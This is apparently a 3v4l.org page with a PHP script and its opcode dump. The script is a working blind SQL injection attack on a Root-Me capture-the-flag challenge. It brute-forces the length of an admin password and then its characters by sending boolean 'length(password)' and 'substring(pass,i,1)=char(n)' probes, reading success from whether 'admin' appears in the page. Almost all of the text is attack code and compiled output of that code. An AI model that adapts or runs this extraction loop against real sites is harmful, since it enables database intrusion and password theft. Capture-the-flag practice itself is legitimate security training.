3v4l.org

<?php
// Disable the script's 30-second execution time limit
set_time_limit(0);
// The base URL to exploit
$url="http://challenge01.root-me.org/web-serveur/ch10?id=1";
/* Brute-force the password length */
$max = 40; // Maximum length we allow ourselves to try
$longueur = 0;
echo "Bruteforce de la longueur du mot de passe en cours...<br />";
for($i = 1; $i<$max; $i++){
    // Open the URL
    $fp = fopen($url . urlencode(" and length(password)=$i"),"r");
    $buf = "";
    // Read the response
    while(!feof($fp))
    {
        $buf .= fgets($fp);
    }
    // If "admin" appears on the page
    if(preg_match("/admin/",$buf)) {
        echo "La longueur du pass est : $i <br />";
        $longueur = $i;
        break;
    }
}
if($longueur == 0) die("Longueur non trouvée");
/* Brute-force the password */
$pass = "";
$i = 1;
// Range of ASCII character codes to scan
$borne_inf = 48;
$borne_sup = 123;
// Initialization
$code = $borne_inf;
while($i <= $longueur){
    if($code == $borne_sup + 1) $code = $borne_inf;
    // Open the URL
    $fp = fopen($url.urlencode(" and substring(pass,$i,1)=char($code)"),"r");
    $ligne = "";
    // Read and test
    while(!feof($fp))
    {
        $ligne .= fgets($fp);
    }
    if(preg_match("/admin/",$ligne)) {
        // A character was found!
        echo "$i eme lettre trouvée : ".chr($code)." <br />";
        $pass .= chr($code);
        // Move on to the next character
        $i++;
        $code = $borne_inf;
    }
    $code++;
}
echo "Pass final : $pass <br />";
?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 43
Branch analysis from position: 43
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 9
Branch analysis from position: 45
2 jumps found. (Code = 43) Position 1 = 47, Position 2 = 48
Branch analysis from position: 47
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 48
1 jumps found. (Code = 42) Position 1 = 103
Branch analysis from position: 103
2 jumps found. (Code = 44) Position 1 = 105, Position 2 = 54
Branch analysis from position: 105
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 54
2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 58
Branch analysis from position: 57
1 jumps found. (Code = 42) Position 1 = 78
Branch analysis from position: 78
2 jumps found. (Code = 44) Position 1 = 83, Position 2 = 74
Branch analysis from position: 83
2 jumps found. (Code = 43) Position 1 = 88, Position 2 = 102
Branch analysis from position: 88
2 jumps found. (Code = 44) Position 1 = 105, Position 2 = 54
Branch analysis from position: 105
Branch analysis from position: 54
Branch analysis from position: 102
Branch analysis from position: 74
2 jumps found. (Code = 44) Position 1 = 83, Position 2 = 74
Branch analysis from position: 83
Branch analysis from position: 74
Branch analysis from position: 58
Branch analysis from position: 9
1 jumps found. (Code = 42) Position 1 = 26
Branch analysis from position: 26
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 22
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 36, Position 2 = 42
Branch analysis from position: 36
1 jumps found. (Code = 42) Position 1 = 45
Branch analysis from position: 45
Branch analysis from position: 42
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 9
Branch analysis from position: 45
Branch analysis from position: 9
Branch analysis from position: 22
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 22
Branch analysis from position: 31
Branch analysis from position: 22
filename:       /in/UnOHb
function name:  (null)
number of ops:  110
compiled vars:  !0 = $url, !1 = $max, !2 = $longueur, !3 = $i, !4 = $fp, !5 = $buf, !6 = $pass, !7 = $borne_inf, !8 = $borne_sup, !9 = $code, !10 = $ligne
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   INIT_FCALL                                               'set_time_limit'
          1        SEND_VAL                                                 0
          2        DO_ICALL                                                 
    5     3        ASSIGN                                                   !0, 'http%3A%2F%2Fchallenge01.root-me.org%2Fweb-serveur%2Fch10%3Fid%3D1'
    7     4        ASSIGN                                                   !1, 40
    8     5        ASSIGN                                                   !2, 0
    9     6        ECHO                                                     'Bruteforce+de+la+longueur+du+mot+de+passe+en+cours...%3Cbr+%2F%3E'
   10     7        ASSIGN                                                   !3, 1
          8      > JMP                                                      ->43
   12     9    >   INIT_FCALL                                               'fopen'
         10        INIT_FCALL                                               'urlencode'
         11        NOP                                                      
         12        FAST_CONCAT                                      ~16     '+and+length%28password%29%3D', !3
         13        SEND_VAL                                                 ~16
         14        DO_ICALL                                         $17     
         15        CONCAT                                           ~18     !0, $17
         16        SEND_VAL                                                 ~18
         17        SEND_VAL                                                 'r'
         18        DO_ICALL                                         $19     
         19        ASSIGN                                                   !4, $19
   13    20        ASSIGN                                                   !5, ''
   15    21      > JMP                                                      ->26
   17    22    >   INIT_FCALL                                               'fgets'
         23        SEND_VAR                                                 !4
         24        DO_ICALL                                         $22     
         25        ASSIGN_OP                                     8          !5, $22
   15    26    >   INIT_FCALL                                               'feof'
         27        SEND_VAR                                                 !4
         28        DO_ICALL                                         $24     
         29        BOOL_NOT                                         ~25     $24
         30      > JMPNZ                                                    ~25, ->22
   20    31    >   INIT_FCALL                                               'preg_match'
         32        SEND_VAL                                                 '%2Fadmin%2F'
         33        SEND_VAR                                                 !5
         34        DO_ICALL                                         $26     
         35      > JMPZ                                                     $26, ->42
   21    36    >   ROPE_INIT                                     3  ~28     'La+longueur+du+pass+est+%3A+'
         37        ROPE_ADD                                      1  ~28     ~28, !3
         38        ROPE_END                                      2  ~27     ~28, '+%3Cbr+%2F%3E'
         39        ECHO                                                     ~27
   22    40        ASSIGN                                                   !2, !3
   23    41      > JMP                                                      ->45
   10    42    >   PRE_INC                                                  !3
         43    >   IS_SMALLER                                               !3, !1
         44      > JMPNZ                                                    ~32, ->9
   26    45    >   IS_EQUAL                                                 !2, 0
         46      > JMPZ                                                     ~33, ->48
         47    > > EXIT                                                     'Longueur+non+trouv%C3%A9e'
   28    48    >   ASSIGN                                                   !6, ''
   29    49        ASSIGN                                                   !3, 1
   31    50        ASSIGN                                                   !7, 48
   32    51        ASSIGN                                                   !8, 123
   34    52        ASSIGN                                                   !9, !7
   35    53      > JMP                                                      ->103
   36    54    >   ADD                                              ~39     !8, 1
         55        IS_EQUAL                                                 !9, ~39
         56      > JMPZ                                                     ~40, ->58
         57    >   ASSIGN                                                   !9, !7
   38    58    >   INIT_FCALL                                               'fopen'
         59        INIT_FCALL                                               'urlencode'
         60        ROPE_INIT                                     5  ~43     '+and+substring%28pass%2C'
         61        ROPE_ADD                                      1  ~43     ~43, !3
         62        ROPE_ADD                                      2  ~43     ~43, '%2C1%29%3Dchar%28'
         63        ROPE_ADD                                      3  ~43     ~43, !9
         64        ROPE_END                                      4  ~42     ~43, '%29'
         65        SEND_VAL                                                 ~42
         66        DO_ICALL                                         $46     
         67        CONCAT                                           ~47     !0, $46
         68        SEND_VAL                                                 ~47
         69        SEND_VAL                                                 'r'
         70        DO_ICALL                                         $48     
         71        ASSIGN                                                   !4, $48
   39    72        ASSIGN                                                   !10, ''
   41    73      > JMP                                                      ->78
   43    74    >   INIT_FCALL                                               'fgets'
         75        SEND_VAR                                                 !4
         76        DO_ICALL                                         $51     
         77        ASSIGN_OP                                     8          !10, $51
   41    78    >   INIT_FCALL                                               'feof'
         79        SEND_VAR                                                 !4
         80        DO_ICALL                                         $53     
         81        BOOL_NOT                                         ~54     $53
         82      > JMPNZ                                                    ~54, ->74
   45    83    >   INIT_FCALL                                               'preg_match'
         84        SEND_VAL                                                 '%2Fadmin%2F'
         85        SEND_VAR                                                 !10
         86        DO_ICALL                                         $55     
         87      > JMPZ                                                     $55, ->102
   47    88    >   NOP                                                      
         89        FAST_CONCAT                                      ~56     !3, '+eme+lettre+trouv%C3%A9e+%3A+'
         90        INIT_FCALL                                               'chr'
         91        SEND_VAR                                                 !9
         92        DO_ICALL                                         $57     
         93        CONCAT                                           ~58     ~56, $57
         94        CONCAT                                           ~59     ~58, '+%3Cbr+%2F%3E'
         95        ECHO                                                     ~59
   48    96        INIT_FCALL                                               'chr'
         97        SEND_VAR                                                 !9
         98        DO_ICALL                                         $60     
         99        ASSIGN_OP                                     8          !6, $60
   50   100        PRE_INC                                                  !3
   51   101        ASSIGN                                                   !9, !7
   53   102    >   PRE_INC                                                  !9
   35   103    >   IS_SMALLER_OR_EQUAL                                      !3, !2
        104      > JMPNZ                                                    ~65, ->54
   55   105    >   ROPE_INIT                                     3  ~67     'Pass+final+%3A+'
        106        ROPE_ADD                                      1  ~67     ~67, !6
        107        ROPE_END                                      2  ~66     ~67, '+%3Cbr+%2F%3E'
        108        ECHO                                                     ~66
   56   109      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0

